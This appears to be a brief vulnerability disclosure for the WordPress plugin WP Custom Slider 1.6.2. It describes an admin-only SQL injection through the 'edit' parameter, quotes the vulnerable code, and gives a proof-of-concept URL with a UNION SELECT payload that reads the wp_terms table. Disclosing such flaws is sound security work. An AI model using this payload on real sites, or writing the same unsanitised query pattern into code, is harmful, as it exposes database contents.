Wp custom slider 1.6.2 – Plugin WordPress – Sql Injection

Homepage:

https://wordpress.org/plugins/wp-custom-slider/

Description:

Type user access: admin user.

$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection

File / Code:

Path: /wp-content/plugin/wp-custom-slider/customslider-ex-settings.php

Line: 371

if(isset($_REQUEST['edit']))
{
   $id=$_REQUEST['edit'];

$query_pag_data=$wpdb->get_results("select * from ".$wpdb->prefix."customslider_images where id=$id");
?>

Proof of Concept:

1 – Login with admin user.

2 – Url with injection:

http://target/wp-admin/options-general.php?page=custom_slider&showall=a&edit=0+UNION+SELECT+1,CONCAT(name,char(58),slug),3,4,5,6,7+FROM+wp_terms+WHERE+term_id=1

2 – Result:

 

 

Timeline:

  • 12/01/2016 – Discovered
  • 13/12/2016 – Vendor not finded

Leave a reply